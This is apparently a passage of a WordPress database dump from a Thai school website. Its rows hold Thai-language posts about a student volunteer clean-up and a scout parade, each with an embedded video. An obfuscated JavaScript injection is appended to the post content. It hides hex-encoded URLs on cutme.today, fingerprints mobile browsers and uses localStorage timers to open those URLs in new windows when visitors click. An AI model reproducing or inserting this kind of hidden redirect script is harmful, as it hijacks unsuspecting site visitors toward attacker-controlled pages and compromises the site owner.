_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วิดีโอกิจกรรมโรงเรียน','','inherit','closed','closed','','292-revision-v1','','','2024-07-31 10:31:29','2024-07-31 03:31:29','',292,'http://pakhaeng.ssk.in.th/?p=300',0,'revision','',0),
(301,1,'2024-07-31 10:32:19','2024-07-31 03:32:19','<!-- wp:paragraph -->\n<p><strong>วันที่ 29 มิถุนายน พ.ศ. 2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ โดยนางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน พร้อมด้วยคณะครูและบุคลากรทางการศึกษา ให้การต้อนรับนักเรียนโรงเรียนกันทรลักษ์วิทยา ที่มาจัด กิจกรรมเพื่อพัฒนาโรงเรียน พร้อมด้วยนักเรียน ชั้น ป.6 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ร่วมกันทำความสะอาด ทาสี และวาดภาพ ทางโรงเรียนฯ ขอขอบคุณนักเรียนจากโรงเรียนกันทรลักษ์วิทยา ที่มาจัดกิจกรรมดี ๆ เพื่อน้อง ๆ โรงเรียนบ้านหนองปลาเข็ง กอไหล่ มา ณ ในโอกาสนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:video {\"id\":286} -->\n<figure class=\"wp-block-video\"><video autoplay controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/จิตอาสา.mp4\"></video></figure>\n<!-- /wp:video -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วิดีโอกิจกรรมโรงเรียน','','inherit','closed','closed','','285-revision-v1','','','2024-07-31 10:32:19','2024-07-31 03:32:19','',285,'http://pakhaeng.ssk.in.th/?p=301',0,'revision','',0),
(302,1,'2024-07-31 10:33:09','2024-07-31 03:33:09','<!-- wp:paragraph -->\n<p>วันที่ 1 กรกฎาคม พ.ศ.2567 นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียนบ้านหนองปลาเข็ง กอไหล่ เป็นประธานในพิธีทบทวนคำปฏิญาณและสวนสนามลูกเสือ เนื่องในวันคล้ายวันสถาปนาคณะลูกเสือแห่งชาติประจำปี 2567 ณ สนามโรงเรียนบ้านหนองปลาเข็ง กอไหล่ โดยมีผู้บังคับบัญชาลูกเสือ เข้าร่วมทำพิธีเพื่อน้อมรำลึกในพระมหากรุณาธิคุณในพระบาทสมเด็จพระมงกุฏเกล้าเจ้าอยู่หัว ผู้พระราชทานกำเนิดลูกเสือไทย และแสดงความจงรักภักดีแด่พระประมุขคณะลูกเสือแห่งชาติ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:video {\"id\":278} -->\n<figure class=\"wp-block-video\"><video autoplay controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สวนสนาม.mp4\"></video></figure>\n<!-- /wp:video -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 